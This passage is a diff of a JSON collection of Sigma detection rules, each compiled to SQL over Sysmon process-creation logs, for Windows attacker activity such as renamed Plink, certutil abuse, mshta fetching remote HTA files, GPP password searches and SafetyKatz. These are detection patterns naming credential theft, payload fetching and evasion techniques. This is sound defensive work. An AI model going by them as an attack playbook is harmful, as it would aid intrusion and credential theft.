AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "status": "experimental", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of X509Enrollment", "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_x509enrollment.yml" + }, + { + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", - "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.g0030", + "attack.g0050", + "attack.s0081", "attack.execution", - "attack.t1218.005" + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrators might use this command to update Sysmon configuration." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + ], + "filename": "proc_creation_win_hktl_safetykatz.yml" + }, + { + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE 